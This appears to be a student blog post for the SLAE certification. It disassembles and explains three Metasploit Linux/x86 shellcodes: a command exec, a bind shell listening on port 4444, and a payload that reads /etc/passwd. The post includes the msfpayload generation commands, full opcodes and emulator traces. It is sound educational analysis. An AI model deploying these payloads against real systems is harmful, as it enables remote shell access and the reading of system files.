SLAE Assignment 5: Shellcode Analysis

Assignment five is about analyzing three different shellcodes, created with msfpayload for Linux/x86.

linux/x86/exec

I chose the linux/x86/exec shellcode as the first example.

With:

$ msfpayload linux/x86/exec cmd="ls" R | ndisasm -u -

it is possible to disassemble the shellcode:

00000000  6A0B              push byte +0xb
00000002  58                pop eax
00000003  99                cdq
00000004  52                push edx
00000005  66682D63          push word 0x632d
00000009  89E7              mov edi,esp
0000000B  682F736800        push dword 0x68732f
00000010  682F62696E        push dword 0x6e69622f
00000015  89E3              mov ebx,esp
00000017  52                push edx
00000018  E803000000        call dword 0x20
0000001D  6C                insb
0000001E  7300              jnc 0x20
00000020  57                push edi
00000021  53                push ebx
00000022  89E1              mov ecx,esp
00000024  CD80              int 0x80

I will now comment on the relevant lines of the shellcode.

00000000  6A0B              push byte +0xb
00000002  58                pop eax

EAX is set to 0xb = 11. This is the syscall number for execve:

$ grep 11 /usr/include/i386-linux-gnu/asm/unistd_32.h
#define __NR_execve              11
... SNIP ...

00000003  99                cdq
00000004  52                push edx

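cdq sign-extends EAX into EDX. Since EAX holds 11 (a positive value), EDX becomes zero. The zero is pushed on the stack to terminate the string that is pushed next.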
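Why cdq zeroes EDX here can be checked with a tiny model of the instruction. This is only a sketch; the helper name cdq is made up for illustration.

```python
def cdq(eax: int) -> int:
    """Return the EDX value that CDQ produces for a given 32-bit EAX."""
    eax &= 0xFFFFFFFF
    # CDQ copies bit 31 (the sign bit) of EAX into every bit of EDX.
    return 0xFFFFFFFF if eax & 0x80000000 else 0x00000000


print(hex(cdq(0x0000000B)))  # EAX = 11 as in the shellcode
print(hex(cdq(0x80000000)))  # a negative EAX for comparison
```

The trick saves a byte compared to xor edx,edx, but it only works because EAX is known to be a small positive number at this point.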

00000005  66682D63          push word 0x632d

This pushes “-c” on the stack.

00000009  89E7              mov edi,esp

Copy the stack pointer to EDI, so EDI now points to “-c”.

0000000B  682F736800        push dword 0x68732f
00000010  682F62696E        push dword 0x6e69622f
00000015  89E3              mov ebx,esp

Push /bin/sh on the stack and copy the stack pointer to EBX, so EBX points to “/bin/sh”.
As can be seen, the ls command is not executed directly. A shell is called with the -c option. From the bash man page:
“-c string If the -c option is present, then commands are read from string. If there are arguments after the string, they are assigned to the positional parameters, starting with $0.”
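The immediates pushed so far can be decoded by packing them as little-endian values, which is how x86 stores them in memory. A minimal sketch; the helper name pushed_bytes is an assumption for illustration only.

```python
import struct


def pushed_bytes(value: int, size: int = 4) -> bytes:
    """Return the bytes that a push of the given immediate leaves in memory."""
    fmt = "<I" if size == 4 else "<H"  # dword or word, little-endian
    return struct.pack(fmt, value)


# push word 0x632d
dash_c = pushed_bytes(0x632D, size=2)

# The value pushed last ends up at the lowest address, so "/bin" comes first.
bin_sh = pushed_bytes(0x6E69622F) + pushed_bytes(0x0068732F)

print(dash_c)
print(bin_sh)
```

The zero byte inside 0x0068732f terminates the path, which is why this payload contains a null byte in its raw form.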

00000017  52                push edx

Push a zero dword again. It becomes the NULL pointer that terminates the argv array.

00000018  E803000000        call dword 0x20

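This one jumps to 0x20. As a side effect, the call pushes its return address (0x1d) on the stack, which is the address of the bytes directly after the call instruction.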

00000020  57                push edi
00000021  53                push ebx
00000022  89E1              mov ecx,esp
00000024  CD80              int 0x80

EDI (“-c”) and EBX (“/bin/sh”) are pushed on the stack, ESP is copied to ECX so that ECX points to the argv array, and the syscall is executed.

Now here comes the interesting part. The command “ls” is not obvious from the disassembly, and I could not find it while debugging with gdb. But the ls command (as hex: 6c 73) is in the code.

0000001D  6C                insb
0000001E  7300              jnc 0x20

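These two lines are not real instructions. ndisasm decodes the bytes 6c 73 00, the string “ls” with its terminating zero, as if they were code. The call at 0x18 pushes the address of this string (0x1d) on the stack as its return address, so the pointer to “ls” becomes the third element of argv. There is no explicit push for it, which is why the debugger does not show one… hmpf.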
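The bytes between the call's return address and its target can be extracted directly from the opcodes of the listing above. This is a small sketch: the byte string is copied from the ndisasm output, and the helper name call_return_and_target is made up for illustration.

```python
import struct

# Opcode bytes copied from the ndisasm listing of linux/x86/exec (cmd="ls").
SHELLCODE = bytes.fromhex(
    "6a0b" "58" "99" "52" "66682d63" "89e7"
    "682f736800" "682f62696e" "89e3" "52"
    "e803000000"   # call dword 0x20
    "6c7300"       # decoded by ndisasm as insb / jnc
    "57" "53" "89e1" "cd80"
)

CALL_OFFSET = 0x18


def call_return_and_target(code: bytes, offset: int):
    """Return (return address, call target) for a near call (opcode E8)."""
    assert code[offset] == 0xE8, "not a near call"
    (rel32,) = struct.unpack_from("<i", code, offset + 1)
    return_address = offset + 5  # opcode byte plus 4 bytes of displacement
    return return_address, return_address + rel32


ret, target = call_return_and_target(SHELLCODE, CALL_OFFSET)
embedded = SHELLCODE[ret:target]
print(hex(ret), hex(target), embedded)
```

The return address that the call pushes is exactly the start of the embedded bytes, so the pointer to the command lands on the stack without a dedicated push instruction.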

So maybe libemu can help us here.

For analyzing the shellcode with libemu I use:

$ msfpayload linux/x86/exec cmd="ls" R | sctest -vvv -Ss 100000 -G Exec.dot

The ls command should be executed. The output shows exactly how the execve call is built.

... SNIP ...
[emu 0x0x8f3e088 debug ] Flags: 
int execve (
     const char * dateiname = 0x00416fc0 => 
           = "/bin/sh";
     const char * argv[] = [
           = 0x00416fb0 => 
               = 0x00416fc0 => 
                   = "/bin/sh";
           = 0x00416fb4 => 
               = 0x00416fc8 => 
                   = "-c";
           = 0x00416fb8 => 
               = 0x0041701d => 
                   = "ls";
           = 0x00000000 => 
             none;
     ];
     const char * envp[] = 0x00000000 => 
         none;
) =  0;
... SNIP ...

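Here it can be seen that a pointer to the “ls” string is on the stack too. The string itself stays inside the shellcode: its address 0x0041701d ends in 0x1d, the offset right after the call instruction.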
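In higher-level terms, the execve call from the libemu output corresponds roughly to the sketch below. It is an approximation under stated assumptions: subprocess starts a child process instead of replacing the current one, the function name run_like_exec_payload is made up, and "echo hello" stands in for "ls" to keep the output predictable.

```python
import subprocess


def run_like_exec_payload(cmd: str) -> str:
    """Run cmd the way the payload does: /bin/sh -c <cmd> with an empty environment."""
    argv = ["/bin/sh", "-c", cmd]  # same three argv entries as in the libemu output
    result = subprocess.run(argv, env={}, capture_output=True, text=True, check=True)
    return result.stdout


print(run_like_exec_payload("echo hello"), end="")
```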

From the Exec.dot file a diagram can be made to illustrate the program execution.

dot Exec.dot -Tpng -o Exec.dot.png

That was it for the first shellcode.

linux/x86/shell_bind_tcp

For the second shellcode to analyze I chose linux/x86/shell_bind_tcp. Disassembling works as follows:

$ msfpayload linux/x86/shell_bind_tcp LPORT=4444 R | ndisasm -u -

00000000  31DB              xor ebx,ebx
00000002  F7E3              mul ebx
00000004  53                push ebx
00000005  43                inc ebx
00000006  53                push ebx
00000007  6A02              push byte +0x2
00000009  89E1              mov ecx,esp
0000000B  B066              mov al,0x66
0000000D  CD80              int 0x80
0000000F  5B                pop ebx
00000010  5E                pop esi
00000011  52                push edx
00000012  680200115C        push dword 0x5c110002
00000017  6A10              push byte +0x10
00000019  51                push ecx
0000001A  50                push eax
0000001B  89E1              mov ecx,esp
0000001D  6A66              push byte +0x66
0000001F  58                pop eax
00000020  CD80              int 0x80
00000022  894104            mov [ecx+0x4],eax
00000025  B304              mov bl,0x4
00000027  B066              mov al,0x66
00000029  CD80              int 0x80
0000002B  43                inc ebx
0000002C  B066              mov al,0x66
0000002E  CD80              int 0x80
00000030  93                xchg eax,ebx
00000031  59                pop ecx
00000032  6A3F              push byte +0x3f
00000034  58                pop eax
00000035  CD80              int 0x80
00000037  49                dec ecx
00000038  79F8              jns 0x32
0000003A  682F2F7368        push dword 0x68732f2f
0000003F  682F62696E        push dword 0x6e69622f
00000044  89E3              mov ebx,esp
00000046  50                push eax
00000047  53                push ebx
00000048  89E1              mov ecx,esp
0000004A  B00B              mov al,0xb
0000004C  CD80              int 0x80

And here is the output from the libemu analysis.

$ msfpayload linux/x86/shell_bind_tcp LPORT=4444 R | sctest -vvv -Ss 100000 -G shell_bind_tcp.dot

... SNIP ...
int socket (
     int domain = 2;
     int type = 1;
     int protocol = 0;
) =  14;
int bind (
     int sockfd = 14;
     struct sockaddr_in * my_addr = 0x00416fc2 => 
         struct   = {
             short sin_family = 2;
             unsigned short sin_port = 23569 (port=4444);
             struct in_addr sin_addr = {
                 unsigned long s_addr = 0 (host=0.0.0.0);
             };
             char sin_zero = "       ";
         };
     int addrlen = 16;
) =  0;
int listen (
     int s = 14;
     int backlog = 0;
) =  0;
int accept (
     int sockfd = 14;
     sockaddr_in * addr = 0x00000000 => 
         none;
     int addrlen = 0x00000010 => 
         none;
) =  19;
int dup2 (
     int oldfd = 19;
     int newfd = 14;
) =  14;
int dup2 (
     int oldfd = 19;
     int newfd = 13;
) =  13;
int dup2 (
     int oldfd = 19;
     int newfd = 12;
) =  12;
int dup2 (
     int oldfd = 19;
     int newfd = 11;
) =  11;
int dup2 (
     int oldfd = 19;
     int newfd = 10;
) =  10;
int dup2 (
     int oldfd = 19;
     int newfd = 9;
) =  9;
int dup2 (
     int oldfd = 19;
     int newfd = 8;
) =  8;
int dup2 (
     int oldfd = 19;
     int newfd = 7;
) =  7;
int dup2 (
     int oldfd = 19;
     int newfd = 6;
) =  6;
int dup2 (
     int oldfd = 19;
     int newfd = 5;
) =  5;
int dup2 (
     int oldfd = 19;
     int newfd = 4;
) =  4;
int dup2 (
     int oldfd = 19;
     int newfd = 3;
) =  3;
int dup2 (
     int oldfd = 19;
     int newfd = 2;
) =  2;
int dup2 (
     int oldfd = 19;
     int newfd = 1;
) =  1;
int dup2 (
     int oldfd = 19;
     int newfd = 0;
) =  0;
int execve (
     const char * dateiname = 0x00416fb2 => 
           = "/bin//sh";
     const char * argv[] = [
           = 0x00416faa => 
               = 0x00416fb2 => 
                   = "/bin//sh";
           = 0x00000000 => 
             none;
     ];
     const char * envp[] = 0x00000000 => 
         none;
) =  0;
... SNIP ...

I will now analyze the relevant parts of the shellcode, using both the disassembly and the libemu output for further explanation.

00000000  31DB              xor ebx,ebx
00000002  F7E3              mul ebx
00000004  53                push ebx
00000005  43                inc ebx
00000006  53                push ebx
00000007  6A02              push byte +0x2
00000009  89E1              mov ecx,esp
0000000B  B066              mov al,0x66
0000000D  CD80              int 0x80

First EBX is zeroed with xor, and mul ebx then zeroes EAX and EDX as well. EBX is pushed on the stack (protocol = 0), then EBX is set to one and pushed again (type = 1 = SOCK_STREAM). After this, two is pushed on the stack (domain = 2 = AF_INET). Then the stack address is copied to ECX, and AL is set to 0x66. This is the syscall number (102) of socketcall, which is called afterward. With EBX = 1 (SYS_SOCKET), the socket() function is executed. The corresponding libemu output:

int socket (
     int domain = 2;
     int type = 1;
     int protocol = 0;
) =  14;
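Because every socket function in this shellcode goes through the single socketcall syscall, EBX decides which function is meant. The mapping can be sketched as a lookup table; the numbers are the SYS_* constants from linux/net.h, while the function name describe_socketcall is made up for illustration.

```python
SYS_SOCKETCALL = 102  # 0x66, the value loaded into EAX/AL before each int 0x80

# Sub-call numbers passed in EBX (SYS_* constants from linux/net.h).
SOCKETCALL_NAMES = {
    1: "socket",
    2: "bind",
    3: "connect",
    4: "listen",
    5: "accept",
}


def describe_socketcall(eax: int, ebx: int) -> str:
    """Name the socket function selected by the EAX/EBX pair."""
    if eax != SYS_SOCKETCALL:
        raise ValueError("EAX does not hold the socketcall syscall number")
    return SOCKETCALL_NAMES[ebx]


for sub_call in (1, 2, 4, 5):  # the four sub-calls used by shell_bind_tcp
    print(sub_call, describe_socketcall(0x66, sub_call))
```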

0000000F  5B                pop ebx
00000010  5E                pop esi
00000011  52                push edx
00000012  680200115C        push dword 0x5c110002
00000017  6A10              push byte +0x10
00000019  51                push ecx
0000001A  50                push eax
0000001B  89E1              mov ecx,esp
0000001D  6A66              push byte +0x66
0000001F  58                pop eax
00000020  CD80              int 0x80

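To shorten things a little, this part calls the bind function (EAX = 102 for the socketcall syscall and EBX = 2 = SYS_BIND = bind()). The 2 is popped into EBX from the top of the stack, where it was left over from the socket() arguments.
This corresponds with the libemu output (the whole output can be seen above).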

int bind (
     int sockfd = 14;
     struct sockaddr_in * my_addr = 0x00416fc2 => 
         struct   = {
             short sin_family = 2;
             unsigned short sin_port = 23569 (port=4444);
             struct in_addr sin_addr = {
                 unsigned long s_addr = 0 (host=0.0.0.0);
             };
             char sin_zero = "       ";
         };
     int addrlen = 16;
) =  0;

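5c11 is port 4444, by the way: the two port bytes 11 5c are stored in network byte order, and 0x115c = 4444. libemu prints the raw little-endian value 23569 (0x5c11) first.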
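The byte order can be verified by unpacking the pushed dword 0x5c110002 by hand. A short sketch with plain integer conversions:

```python
import struct

# push dword 0x5c110002 leaves these four bytes in memory (little-endian).
raw = struct.pack("<I", 0x5C110002)

sin_family = int.from_bytes(raw[0:2], "little")  # host byte order
sin_port = int.from_bytes(raw[2:4], "big")       # network byte order
raw_port = int.from_bytes(raw[2:4], "little")    # the value libemu prints first

print(raw.hex(), sin_family, sin_port, raw_port)
```

So a single push sets up both sin_family (2 = AF_INET) and sin_port of the sockaddr_in structure.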

00000022  894104            mov [ecx+0x4],eax
00000025  B304              mov bl,0x4
00000027  B066              mov al,0x66
00000029  CD80              int 0x80

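mov [ecx+0x4],eax writes the return value of bind() (0 on success) into the second argument slot, which becomes the backlog. Then AL is set to 0x66 and BL to 4, which selects the listen() function. (If EAX shows up as ffffff66 in the debugger, the upper bytes still hold a negative return value, which means the preceding bind() failed.)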

$ less /usr/include/linux/net.h | grep 4
#define SYS_LISTEN      4               /* sys_listen(2)                */

Here is the libemu output:

int listen (
     int s = 14;
     int backlog = 0;
) =  0;

0000002B  43                inc ebx
0000002C  B066              mov al,0x66
0000002E  CD80              int 0x80

EBX is now 5 (SYS_ACCEPT), which selects the accept function…

int accept (
     int sockfd = 14;
     sockaddr_in * addr = 0x00000000 => 
         none;
     int addrlen = 0x00000010 => 
         none;
) =  19;

00000030  93                xchg eax,ebx
00000031  59                pop ecx
00000032  6A3F              push byte +0x3f
00000034  58                pop eax
00000035  CD80              int 0x80
00000037  49                dec ecx
00000038  79F8              jns 0x32

EAX = 0x3f = 63, this is the syscall number for dup2.

$ grep 63 /usr/include/i386-linux-gnu/asm/unistd_32.h
#define __NR_dup2                63

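xchg eax,ebx moves the file descriptor returned by accept() into EBX, and pop ecx loads the descriptor of the listening socket from the stack as the loop counter. The dup2 call is repeated while ECX counts down and stops once ECX becomes negative, so every descriptor down to 0 (stderr, stdout and stdin included) is redirected to the client connection.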
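The loop condition can be modeled in a few lines to see which descriptors get duplicated. This is a sketch of the control flow only, no real dup2 is called; the function name dup2_targets is an assumption.

```python
def dup2_targets(start_fd: int) -> list:
    """Model the dup2 loop: return every newfd value in call order."""
    targets = []
    ecx = start_fd           # pop ecx: descriptor of the listening socket
    while True:
        targets.append(ecx)  # int 0x80 with EAX = 63: dup2(client_fd, ecx)
        ecx -= 1             # dec ecx
        if ecx < 0:          # jns 0x32 is not taken once the sign flag is set
            break
    return targets


print(dup2_targets(3))        # a typical descriptor number in a fresh process
print(len(dup2_targets(14)))  # the libemu run starts at 14
```

With the descriptor 14 from the libemu run this gives fifteen calls, matching the fifteen dup2 entries in the output above.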

0000003A  682F2F7368        push dword 0x68732f2f
0000003F  682F62696E        push dword 0x6e69622f
00000044  89E3              mov ebx,esp
00000046  50                push eax
00000047  53                push ebx
00000048  89E1              mov ecx,esp
0000004A  B00B              mov al,0xb
0000004C  CD80              int 0x80

Finally we have the execve call. This works pretty much as in the analysis of the linux/x86/exec shellcode. EAX is 0 after the last successful dup2 call, so push eax provides the NULL that terminates argv.

int execve (
     const char * dateiname = 0x00416fb2 => 
           = "/bin//sh";
     const char * argv[] = [
           = 0x00416faa => 
               = 0x00416fb2 => 
                   = "/bin//sh";
           = 0x00000000 => 
             none;
     ];
     const char * envp[] = 0x00000000 => 
         none;
) =  0;

I also stepped through the shellcode in the debugger, but the output there did not add anything to the analysis.

And finally the flowchart.

$ dot shell_bind_tcp.dot -Tpng -o shell_bind_tcp.dot.png

So that was it for the second analysis.

linux/x86/read_file

So let us start by disassembling the shellcode:

$ sudo msfpayload linux/x86/read_file PATH="/etc/passwd" R | ndisasm -u -

00000000  EB36              jmp short 0x38
00000002  B805000000        mov eax,0x5
00000007  5B                pop ebx
00000008  31C9              xor ecx,ecx
0000000A  CD80              int 0x80
0000000C  89C3              mov ebx,eax
0000000E  B803000000        mov eax,0x3
00000013  89E7              mov edi,esp
00000015  89F9              mov ecx,edi
00000017  BA00100000        mov edx,0x1000
0000001C  CD80              int 0x80
0000001E  89C2              mov edx,eax
00000020  B804000000        mov eax,0x4
00000025  BB01000000        mov ebx,0x1
0000002A  CD80              int 0x80
0000002C  B801000000        mov eax,0x1
00000031  BB00000000        mov ebx,0x0
00000036  CD80              int 0x80
00000038  E8C5FFFFFF        call dword 0x2
0000003D  2F                das
0000003E  657463            gs jz 0xa4
00000041  2F                das
00000042  7061              jo 0xa5
00000044  7373              jnc 0xb9
00000046  7764              ja 0xac
00000048  00                db 0x00

Libemu and sctest did not work for me here, so I will only look at the disassembly and the debugger.

First things first: the shellcode uses the JMP-CALL-POP technique. This can be seen very well by stepping through the code, but also by having a look at the disassembled code.

00000000  EB36              jmp short 0x38

Jump to address 0x38.

00000038  E8C5FFFFFF        call dword 0x2
0000003D  2F                das
0000003E  657463            gs jz 0xa4
00000041  2F                das
00000042  7061              jo 0xa5
00000044  7373              jnc 0xb9
00000046  7764              ja 0xac
00000048  00                db 0x00

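Call 0x2. Be aware that 0x3D to 0x48 is data, not code. It is nothing other than the path /etc/passwd with a terminating zero byte. The call pushes the address of this path (0x3d) on the stack as its return address.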
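The JMP-CALL-POP layout can be followed by computing both branch targets from the opcodes and then reading the bytes behind the call. A sketch under the assumption that the byte string below is copied correctly from the ndisasm listing; the helper names are made up for illustration.

```python
import struct

# Opcode bytes copied from the ndisasm listing of linux/x86/read_file.
SHELLCODE = bytes.fromhex(
    "eb36"
    "b805000000" "5b" "31c9" "cd80"
    "89c3" "b803000000" "89e7" "89f9" "ba00100000" "cd80"
    "89c2" "b804000000" "bb01000000" "cd80"
    "b801000000" "bb00000000" "cd80"
    "e8c5ffffff"
    "2f6574632f70617373776400"
)


def jmp_short_target(code: bytes, offset: int) -> int:
    """Target of a short jump (opcode EB) with a signed 8-bit displacement."""
    assert code[offset] == 0xEB, "not a short jump"
    (rel8,) = struct.unpack_from("<b", code, offset + 1)
    return offset + 2 + rel8


def call_return_and_target(code: bytes, offset: int):
    """Return (return address, target) of a near call (opcode E8)."""
    assert code[offset] == 0xE8, "not a near call"
    (rel32,) = struct.unpack_from("<i", code, offset + 1)
    return offset + 5, offset + 5 + rel32


call_at = jmp_short_target(SHELLCODE, 0)                # JMP
ret, target = call_return_and_target(SHELLCODE, call_at)  # CALL
path = SHELLCODE[ret:SHELLCODE.index(b"\x00", ret)]       # what POP will point to

print(hex(call_at), hex(ret), hex(target), path)
```

The negative displacement of the call (c5 ff ff ff) is what lets the code jump backwards without containing null bytes in that instruction.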

00000002  B805000000        mov eax,0x5
00000007  5B                pop ebx
00000008  31C9              xor ecx,ecx
0000000A  CD80              int 0x80

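Move 5 to EAX for syscall 5, which is open(). pop ebx takes the return address from the stack, so EBX points to /etc/passwd. ECX is zeroed, which means the flags are O_RDONLY. The syscall returns the file descriptor in EAX, for example 3.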

0000000C  89C3              mov ebx,eax
0000000E  B803000000        mov eax,0x3
00000013  89E7              mov edi,esp
00000015  89F9              mov ecx,edi
00000017  BA00100000        mov edx,0x1000
0000001C  CD80              int 0x80

Here the syscall for read() is executed. EBX gets the file descriptor returned by open(), and EAX is set to 3, the syscall number for read(). ECX points to the buffer on the stack (via EDI). EDX, which holds the size, is set to 0x1000 = 4096 bytes.

0000001E  89C2              mov edx,eax
00000020  B804000000        mov eax,0x4
00000025  BB01000000        mov ebx,0x1
0000002A  CD80              int 0x80

So finally the result is written to the standard output (syscall 4 is write(), EBX = 1 is stdout). EDX holds the number of bytes that read() returned.

0000002C  B801000000        mov eax,0x1
00000031  BB00000000        mov ebx,0x0
00000036  CD80              int 0x80

And exit (syscall 1 with status 0).
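The four syscalls of this payload map closely to the os module, so the whole flow can be sketched as follows. The function name read_file_like_shellcode and the out_fd parameter are made up for illustration, and the sketch closes the descriptor, which the shellcode itself does not bother to do.

```python
import os


def read_file_like_shellcode(path: str, out_fd: int = 1) -> int:
    """Mirror the payload: open, read up to 0x1000 bytes, write them to out_fd."""
    fd = os.open(path, os.O_RDONLY)   # syscall 5: open(path, 0)
    try:
        data = os.read(fd, 0x1000)    # syscall 3: read(fd, buf, 4096)
    finally:
        os.close(fd)                  # not part of the shellcode
    return os.write(out_fd, data)     # syscall 4: write(1, buf, bytes_read)


if __name__ == "__main__" and os.path.exists("/etc/passwd"):
    read_file_like_shellcode("/etc/passwd")
```

Like the shellcode, the sketch performs a single read, so only the first 4096 bytes of a larger file would be printed.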

So that was it for the last analysis.

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Student ID: SLAE-342

danielsauder